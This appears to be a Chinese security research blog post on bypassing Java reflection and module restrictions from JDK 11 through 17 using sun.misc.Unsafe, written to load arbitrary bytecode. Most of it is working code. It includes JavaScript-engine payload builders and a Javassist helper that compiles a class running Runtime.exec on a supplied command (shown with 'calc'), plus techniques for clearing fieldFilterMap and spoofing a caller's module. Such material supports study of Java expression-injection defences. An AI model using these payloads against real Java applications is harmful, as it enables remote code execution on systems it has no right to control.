静态常量修改
修改static final属性值,关键在于通过反射将字段的final修饰符去掉
在JDK<=11,可以按照如下流程修改:
通过反射获取java.lang.reflect.Field内部的modifiers Field
将修改目标字段的 modifiers 修改为非 final
Copy public class FinalTest {
private static final String secret = "Y0U_C4nNot_M0d1fy_M3";
}
Field modifierField = Class.forName("java.lang.reflect.Field").getDeclaredField("modifiers");
modifierField.setAccessible(true);
Field secret = FinalTest.class.getDeclaredField("secret");
secret.setAccessible(true);
modifierField.setInt(secret, secret.getModifiers() & ~Modifier.FINAL);
secret.set(null, "G0T_Y0U");
System.out.println(secret.get(null)); // G0T_Y0U 但自从 Java 12 开始,直接获取 Field 的 modifiers 字段会得到以下错误
Exception java.lang.NoSuchFieldException: modifiers
at java.base/java.lang.Class.getDeclaredField
👉 https://bugs.openjdk.org/browse/JDK-8210522
为防止安全敏感的字段被修改,JDK12开始反射过滤机制增强
对比 JDK11 和 JDK14 的jdk.internal.reflect.Reflection
可以看到fieldFilterMap增加了Field.class的所有成员,即Field下的任何字段都不能直接通过公共反射方法获取。
跟一下反射调用的流程 getDeclaredField
进入privateGetDeclaredFields,看到这里开始过滤反射字段
这里实际上已经通过getDeclaredFields0获取到了所有字段了
getDeclaredFields0是java.lang.Class下的方法,Reflection中的methodFilterMap并未过滤此方法,因此我们直接反射调用getDeclaredFields0就能获取到Fields的所有成员
Copy Method getDeclaredFields0 = Class.class.getDeclaredMethod("getDeclaredFields0", boolean.class);
getDeclaredFields0.setAccessible(true);
Field[] fields = (Field[]) getDeclaredFields0.invoke(Field.class, false);
Field modifierField = null;
for (Field f : fields) {
if ("modifiers".equals(f.getName())) {
modifierField = f;
break;
}
}
modifierField.setAccessible(true);
Field secret = FinalTest.class.getDeclaredField("secret");
secret.setAccessible(true);
modifierField.setInt(secret, secret.getModifiers() & ~Modifier.FINAL);
secret.set(null, "G0T_Y0U");
System.out.println(secret.get(null)); 上面的绕过在JDK17以下可以成功,JDK17对java* 下的非公共字段进行反射调用获取的话就会直接报错,且看下文分析
反射加载字节码
Java不像其他脚本语言,如js、php、python等有eval函数,可以把字符串当作代码来执行。
因此在Java中最直接的任意代码执行的方式就是加载字节码了。其他代码执行的方式,如EL表达式、js引擎,限于语法的差异,并不能完美地兼容和契合Java自身的语法和类型。
加载字节码的几种方法:
URLClassLoader#loadClass:需要出网或文件落地,不好使
TransletClassLoader#defineClass:一般通过反序列化漏洞打进来
ClassLoader#defineClass:需要通过反射调用
通过JS配合ClassLoader#defineClass来做到任意代码执行
JDK版本更迭史:
JDK6、7
引入JS引擎、采用Rhino实现,不支持Java.type等获取Java类型的操作
JDK11
默认禁止跨包之间反射调用非公共方法(非强制,只是警告)
JDK12
Reflection类下的fieldFilterMap增加过滤。反射被大大限制
JDK11
Copy public static String getJsPayload2(String code) throws Exception {
return "var data = '" + code + "';" +
"var bytes = java.util.Base64.getDecoder().decode(data);" +
"var int = Java.type(\"int\");" +
"var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod(" +
"\"defineClass\", bytes.class, int.class, int.class);" +
"defineClassMethod.setAccessible(true);" +
"var cc = defineClassMethod.invoke(" +
"Thread.currentThread().getContextClassLoader(), bytes, 0, bytes.length);" +
"cc.getConstructor(java.lang.String.class).newInstance(cmd);";
}
public static byte[] getEvilCode(String cmd) throws Exception {
ClassPool pool = ClassPool.getDefault();
CtClass clazz = pool.makeClass("a");
CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");
clazz.addConstructor(constructor);
clazz.getClassFile().setMajorVersion(49);
return clazz.toBytecode();
}
@Test
public void jsTest() throws Exception {
ScriptEngineManager manager = new ScriptEngineManager();
manager.getEngineByName("js").eval(getJsPayload2(Base64.getEncoder().encodeToString(getEvilCode("calc"))));
} 上面通过js加载字节码会报错
java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(byte[],int,int) throws java.lang.ClassFormatError accessible: module java.base does not "opens java.lang" to module jdk.scripting.nashorn.scripts
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible
但直接运行下面代码却可以
Copy public static void main(String[] args) throws Exception {
Class<?> c = Class.forName("java.lang.ClassLoader");
Method method = c.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
method.setAccessible(true);
byte[] bytes = getEvilCode("calc");
Class<?> aClass = (Class<?>) method.invoke(Thread.currentThread().getContextClassLoader(), bytes, 0, bytes.length);
aClass.newInstance();
} java.lang.reflect.Method继承自java.lang.reflect.Executable,Executable和java.lang.reflect.Field均继承自java.lang.reflect.AccessibleObject
AccessibleObject#checkCanSetAccessible用于检测成员是否可以被设置为可访问
可以看到是否可访问取决于如下条件:
目标类为Public
待访问的成员为Protected、Static,且调用方是目标类的子类
modifiers Bypass
根据上面的可访问条件,ClassLoader为PUBLIC,我们只需将defineClass方法的修饰符修改为PUBLIC即可
Java版本:
Copy public static void bypassModifier() throws Exception {
Class<?> clazz = Class.forName("sun.misc.Unsafe");
Field field = clazz.getDeclaredField("theUnsafe");
field.setAccessible(true);
Unsafe unsafe = (Unsafe) field.get(null);
Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
Field modifiers = defineClassMethod.getClass().getDeclaredField("modifiers");
unsafe.putShort((Object) defineClassMethod, unsafe.objectFieldOffset(modifiers), (short) Modifier.PUBLIC);
byte[] bytes = getEvilCode("calc");
Class<?> aClass = (Class<?>) defineClassMethod.invoke(Thread.currentThread().getContextClassLoader(), bytes, 0, bytes.length);
aClass.newInstance();
} Js版本:
Copy public static String getJsPayload3(String code) throws Exception {
return "var data = '" + code + "';" +
"var bytes = java.util.Base64.getDecoder().decode(data);" +
"var Unsafe = Java.type(\"sun.misc.Unsafe\");" +
"var field = Unsafe.class.getDeclaredField(\"theUnsafe\");" +
"field.setAccessible(true);" +
"var unsafe = field.get(null);" +
"var Modifier = Java.type(\"java.lang.reflect.Modifier\");" +
"var byteArray = Java.type(\"byte[]\");" +
"var int = Java.type(\"int\");" +
"var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod(" +
"\"defineClass\",byteArray.class,int.class,int.class);" +
"var modifiers = defineClassMethod.getClass().getDeclaredField(\"modifiers\");" +
"unsafe.putShort(defineClassMethod, unsafe.objectFieldOffset(modifiers), Modifier.PUBLIC);" +
"var cc = defineClassMethod.invoke(" +
"java.lang.Thread.currentThread().getContextClassLoader(),bytes,0,bytes.length);" +
"cc.newInstance();";
} override field Bypass
回看setAccessible的调用逻辑
Copy @Override
@CallerSensitive
public void setAccessible(boolean flag) {
AccessibleObject.checkPermission();
if (flag) checkCanSetAccessible(Reflection.getCallerClass());
setAccessible0(flag);
} checkCanSetAccessible去判断目标的修饰符、目标类是否对调用类开放...最后返回flag再传给setAccessible0
Copy boolean setAccessible0(boolean flag) {
this.override = flag;
return flag;
} setAccessible0直接将flag赋值给this.override,override是其父类AccessibleObject的属性
因此也可以直接修改java.lang.reflect.AccessibleObject的override属性
Copy public static void bypassOverride(Object accessibleObject) throws Exception {
Field f = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
f.setAccessible(true);
Unsafe unsafe = (Unsafe) f.get(null);
Field override = Class.forName("java.lang.reflect.AccessibleObject").getDeclaredField("override");
unsafe.putBoolean(accessibleObject, unsafe.objectFieldOffset(override), true);
}
Class<?> c = Class.forName("java.lang.ClassLoader");
Method method = c.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
bypassOverride(method);
byte[] bytes = getEvilCode("calc");
Class<?> aClass = (Class<?>) method.invoke(Thread.currentThread().getContextClassLoader(), bytes, 0, bytes.length);
aClass.newInstance();
Copy String bypass = "var bypass = function(obj){" +
"var Unsafe = Java.type('sun.misc.Unsafe');" +
"var field = Unsafe.class.getDeclaredField(\"theUnsafe\");" +
"field.setAccessible(true);" +
"var unsafe = field.get(null);" +
"var overrideField =" +
"java.lang.Class.forName(\"java.lang.reflect.AccessibleObject\").getDeclaredField(\"override\");" +
"var offset = unsafe.objectFieldOffset(overrideField);" +
"unsafe.putBoolean(obj, offset, true);};"; JDK>=12之后,反射也过滤java.lang.reflect.AccessibleObject类的所有成员,得通过getDeclaredFields0去获取override属性
JDK 12/13/14
JDK>=12报错提示:没有modifiers字段
Caused by: java.lang.NoSuchFieldException: modifiers at java.base/java.lang.Class.getDeclaredField
fieldFilterMap Bypass
看的BeiChen师傅写的 orz
https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java
直接把fieldFilterMap置空了。
通过unsafe.defineAnonymousClass创建匿名内部类,由此匿名类来获取类成员偏移量(为什么要创建匿名类是因为fieldFilterMap过滤了Reflection的所有成员,无法直接使用getDeclaredField获取Field),最后再通过unsafe.putObject修改原来Reflection类的静态成员fieldFilterMap,此外还要删除reflectionData反射缓存。
Java版本:
Copy public static void bypassFieldFilterMap() throws Exception {
Field f = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
f.setAccessible(true);
Unsafe unsafe = (Unsafe) f.get(null);
Class<?> reflectionClass = Class.forName("jdk.internal.reflect.Reflection");
byte[] classBuffer = reflectionClass.getResourceAsStream("Reflection.class").readAllBytes();
Class<?> reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass, classBuffer, null);
Field fieldFilterMap = reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
if (fieldFilterMap.getType().isAssignableFrom(HashMap.class)) {
unsafe.putObject(reflectionClass, unsafe.staticFieldOffset(fieldFilterMap), new HashMap<>());
}
byte[] clz = Class.class.getResourceAsStream("Class.class").readAllBytes();
Class<?> classAnonymousClass = unsafe.defineAnonymousClass(Class.class, clz, null);
Field reflectionData = classAnonymousClass.getDeclaredField("reflectionData");
unsafe.putObject(Class.class, unsafe.objectFieldOffset(reflectionData), null);
} Js版本:
Copy String bypass = "var bypass = function(){" +
"var Unsafe = Java.type('sun.misc.Unsafe');" +
"var HashMap = Java.type('java.util.HashMap');" +
"var field = Unsafe.class.getDeclaredField(\"theUnsafe\");" +
"field.setAccessible(true);" +
"var unsafe = field.get(null);" +
"var classClass = Java.type(\"java.lang.Class\");" +
"var reflectionClass = java.lang.Class.forName(\"jdk.internal.reflect.Reflection\");" +
"var classBuffer = reflectionClass.getResourceAsStream(\"Reflection.class\").readAllBytes();" +
"var reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass, classBuffer, null);" +
"var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField(\"fieldFilterMap\");" +
"if (fieldFilterMapField.getType().isAssignableFrom(HashMap.class)) {" +
"unsafe.putObject(reflectionClass, unsafe.staticFieldOffset(fieldFilterMapField), new HashMap());" +
"}" +
"var clz = java.lang.Class.forName(\"java.lang.Class\").getResourceAsStream(\"Class.class\").readAllBytes();" +
"var ClassAnonymousClass = unsafe.defineAnonymousClass(java.lang.Class.forName(\"java.lang.Class\"), clz, null);" +
"var reflectionDataField = ClassAnonymousClass.getDeclaredField(\"reflectionData\");" +
"unsafe.putObject(classClass, unsafe.objectFieldOffset(reflectionDataField), null);};"; defineAnonymousClass Bypass
虽然JDK11把Unsafe#defineClass移除了,但Unsafe#defineAnonymousClass还在
Copy Field f = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
f.setAccessible(true);
Unsafe unsafe = (Unsafe) f.get(null);
unsafe.defineAnonymousClass(Class.class, getEvilCode("calc"), null).newInstance();
Copy public static String getJsPayload5(String code) throws Exception {
return "var data = '" + code + "';" +
"var bytes = java.util.Base64.getDecoder().decode(data);" +
"var theUnsafe = java.lang.Class.forName(\"sun.misc.Unsafe\").getDeclaredField(\"theUnsafe\");" +
"theUnsafe.setAccessible(true);" +
"unsafe = theUnsafe.get(null);" +
"unsafe.defineAnonymousClass(java.lang.Class.forName(\"java.lang.Class\"), bytes, null).newInstance();";
} JDK17
JDK17中,在checkCanSetAccessible最后一关判断模块是否开放不能通过,导致抛出异常Unable to make xxx accessible: module xxx does not opens xxx to xxx
Copy // package is open to caller
if (declaringModule.isOpen(pn, callerModule)) {
return true;
} declaringModule即目标AccessibleObject所在类declaringClass所在的模块
比如java.lang.Class所在java.base
pn是declaringClass的包名
跟进Module#isOpen
Copy /*
* Returns true if this module exports or opens the given package
* to the given module. If the other module is EVERYONE_MODULE then
* this method tests if the package is exported or opened
* unconditionally.
*/
private boolean implIsExportedOrOpen(String pn, Module other, boolean open) {
// all packages in unnamed modules are open
if (!isNamed())
return true;
// all packages are exported/open to self
if (other == this && descriptor.packages().contains(pn))
return true;
// all packages in open and automatic modules are open
if (descriptor.isOpen() || descriptor.isAutomatic())
return descriptor.packages().contains(pn);
// exported/opened via module declaration/descriptor
if (isStaticallyExportedOrOpen(pn, other, open))
return true;
// exported via addExports/addOpens
if (isReflectivelyExportedOrOpen(pn, other, open))
return true;
// not exported or open to other
return false;
} 如何判断目标模块是否开放或导出?
调用者所在模块就是目标模块,并且pn是目标模块下的包
目标模块设置设置对外开放或者它是automatic模块
目标模块是否导出pn包(isStaticallyExportedOrOpen)
目标模块是否反射可导出pn包(isReflectivelyExportedOrOpen)
( JDK<17,这里isStaticallyExportedOrOpen返回true,模块默认开放所有包)
实际上这里有些条件在checkCanSetAccessible开始已经判定过了
Copy private boolean checkCanSetAccessible(Class<?> caller,
Class<?> declaringClass,
boolean throwExceptionIfDenied) {
Module callerModule = caller.getModule();
Module declaringModule = declaringClass.getModule();
if (callerModule == declaringModule) return true;
if (callerModule == Object.class.getModule()) return true;
if (!declaringModule.isNamed()) return true;
} callerModule和declaringModule一致
callerModule和Object所在模块一致
declaringModule是unnamed modules
因此我们通过Unsafe修改当前调用者的模块为Object所在模块
(用Unsafe修改,刚好fieldFilterMap没有过滤Class的module成员)
还是以最开始的修改final字段为例
Copy // 设置当前调用者的模块为Object所在模块java.base
Class UnsafeClass = Class.forName("sun.misc.Unsafe");
Field unsafeField = UnsafeClass.getDeclaredField("theUnsafe");
unsafeField.setAccessible(true);
Unsafe unsafe = (Unsafe) unsafeField.get(null);
Module objModule = Object.class.getModule();
long addr = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));
unsafe.getAndSetObject(FinalBypass.class, addr, objModule);
Method getDeclaredFields0 = Class.forName("java.lang.Class").getDeclaredMethod("getDeclaredFields0", boolean.class);
getDeclaredFields0.setAccessible(true);
Field[] fields = (Field[]) getDeclaredFields0.invoke(Field.class, false);
Field modifierField = null;
for (Field field : fields) {
if (field.getName().equals("modifiers")) {
modifierField = field;
break;
}
}
if (modifierField == null)
throw new NoSuchFieldException("modifiers");
modifierField.setAccessible(true);
Field secret = FinalTest.class.getDeclaredField("secret");
secret.setAccessible(true);
modifierField.setInt(secret, secret.getModifiers() & ~Modifier.FINAL);
secret.set(null, "G0T_Y0U");
System.out.println(secret.get(null)); // G0T_Y0U SumUp
总的来说,高版本JDK对于反射的限制有两点:
JDK >= 12,fieldFilterMap新增黑名单类,反射获取字段受限
JDK >= 9,反射调用方法/获取非公开字段,checkCanSetAccessible判断模块是否对外开放,非public类或非public方法/字段无法调用/获取
相应的绕过:
JDK <= 11,对于公开类下的非公开成员的访问,修改其访问修饰符为public,或者修改AccessibleObject的override属性为true
12 <= JDK < 17,Unsafe实例化一个Reflection,获取fieldFilterMap偏移量,再置为空
JDK = 17,修改当前调用类的module为Object的module
Reference
2023KCon 《Java表达式攻防下的黑魔法》
https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java
